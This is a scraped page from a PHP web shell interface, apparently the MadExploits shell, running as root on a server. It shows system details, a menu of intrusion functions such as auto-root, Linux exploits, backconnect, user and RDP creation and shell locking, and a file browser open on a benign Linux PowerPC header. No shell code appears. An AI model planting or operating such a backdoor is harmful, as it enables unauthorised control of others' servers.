Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
powerpc64le-linux-gnu /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
1.8
KB
-rw-r--r--
bitsperlong.h
312
B
-rw-r--r--
bootx.h
4.3
KB
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
550
B
-rw-r--r--
cputable.h
2.33
KB
-rw-r--r--
eeh.h
2.18
KB
-rw-r--r--
elf.h
13.09
KB
-rw-r--r--
epapr_hcalls.h
4.16
KB
-rw-r--r--
errno.h
278
B
-rw-r--r--
fcntl.h
367
B
-rw-r--r--
ioctl.h
302
B
-rw-r--r--
ioctls.h
4.26
KB
-rw-r--r--
ipcbuf.h
1.03
KB
-rw-r--r--
kvm.h
25.51
KB
-rw-r--r--
kvm_para.h
2.71
KB
-rw-r--r--
mman.h
1.25
KB
-rw-r--r--
msgbuf.h
1.13
KB
-rw-r--r--
nvram.h
2.01
KB
-rw-r--r--
opal-prd.h
1.73
KB
-rw-r--r--
papr-miscdev.h
184
B
-rw-r--r--
papr-sysparm.h
2.01
KB
-rw-r--r--
papr-vpd.h
538
B
-rw-r--r--
param.h
31
B
-rw-r--r--
perf_event.h
550
B
-rw-r--r--
perf_regs.h
2.68
KB
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
594
B
-rw-r--r--
ps3fb.h
1.74
KB
-rw-r--r--
ptrace.h
7.54
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
1.12
KB
-rw-r--r--
setup.h
188
B
-rw-r--r--
shmbuf.h
1.68
KB
-rw-r--r--
sigcontext.h
4.24
KB
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
2.49
KB
-rw-r--r--
socket.h
600
B
-rw-r--r--
sockios.h
33
B
-rw-r--r--
spu_info.h
774
B
-rw-r--r--
stat.h
2.31
KB
-rw-r--r--
statfs.h
32
B
-rw-r--r--
swab.h
560
B
-rw-r--r--
termbits.h
4.01
KB
-rw-r--r--
termios.h
1.66
KB
-rw-r--r--
tm.h
734
B
-rw-r--r--
types.h
1.27
KB
-rw-r--r--
ucontext.h
961
B
-rw-r--r--
unistd.h
562
B
-rw-r--r--
unistd_32.h
11.78
KB
-rw-r--r--
unistd_64.h
10.89
KB
-rw-r--r--
vas-api.h
649
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cputable.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef __ASM_POWERPC_CPUTABLE_H #define __ASM_POWERPC_CPUTABLE_H /* in AT_HWCAP */ #define PPC_FEATURE_32 0x80000000 #define PPC_FEATURE_64 0x40000000 #define PPC_FEATURE_601_INSTR 0x20000000 #define PPC_FEATURE_HAS_ALTIVEC 0x10000000 #define PPC_FEATURE_HAS_FPU 0x08000000 #define PPC_FEATURE_HAS_MMU 0x04000000 #define PPC_FEATURE_HAS_4xxMAC 0x02000000 #define PPC_FEATURE_UNIFIED_CACHE 0x01000000 #define PPC_FEATURE_HAS_SPE 0x00800000 #define PPC_FEATURE_HAS_EFP_SINGLE 0x00400000 #define PPC_FEATURE_HAS_EFP_DOUBLE 0x00200000 #define PPC_FEATURE_NO_TB 0x00100000 #define PPC_FEATURE_POWER4 0x00080000 #define PPC_FEATURE_POWER5 0x00040000 #define PPC_FEATURE_POWER5_PLUS 0x00020000 #define PPC_FEATURE_CELL 0x00010000 #define PPC_FEATURE_BOOKE 0x00008000 #define PPC_FEATURE_SMT 0x00004000 #define PPC_FEATURE_ICACHE_SNOOP 0x00002000 #define PPC_FEATURE_ARCH_2_05 0x00001000 #define PPC_FEATURE_PA6T 0x00000800 #define PPC_FEATURE_HAS_DFP 0x00000400 #define PPC_FEATURE_POWER6_EXT 0x00000200 #define PPC_FEATURE_ARCH_2_06 0x00000100 #define PPC_FEATURE_HAS_VSX 0x00000080 #define PPC_FEATURE_PSERIES_PERFMON_COMPAT \ 0x00000040 /* Reserved - do not use 0x00000004 */ #define PPC_FEATURE_TRUE_LE 0x00000002 #define PPC_FEATURE_PPC_LE 0x00000001 /* in AT_HWCAP2 */ #define PPC_FEATURE2_ARCH_2_07 0x80000000 #define PPC_FEATURE2_HTM 0x40000000 #define PPC_FEATURE2_DSCR 0x20000000 #define PPC_FEATURE2_EBB 0x10000000 #define PPC_FEATURE2_ISEL 0x08000000 #define PPC_FEATURE2_TAR 0x04000000 #define PPC_FEATURE2_VEC_CRYPTO 0x02000000 #define PPC_FEATURE2_HTM_NOSC 0x01000000 #define PPC_FEATURE2_ARCH_3_00 0x00800000 /* ISA 3.00 */ #define PPC_FEATURE2_HAS_IEEE128 0x00400000 /* VSX IEEE Binary Float 128-bit */ #define PPC_FEATURE2_DARN 0x00200000 /* darn random number insn */ #define PPC_FEATURE2_SCV 0x00100000 /* scv syscall */ #define PPC_FEATURE2_HTM_NO_SUSPEND 0x00080000 /* TM w/out suspended state */ #define PPC_FEATURE2_ARCH_3_1 0x00040000 /* ISA 3.1 */ #define PPC_FEATURE2_MMA 0x00020000 /* Matrix Multiply Assist */ /* * IMPORTANT! * All future PPC_FEATURE definitions should be allocated in cooperation with * OPAL / skiboot firmware, in accordance with the ibm,powerpc-cpu-features * device tree binding. */ #endif /* __ASM_POWERPC_CPUTABLE_H */
Close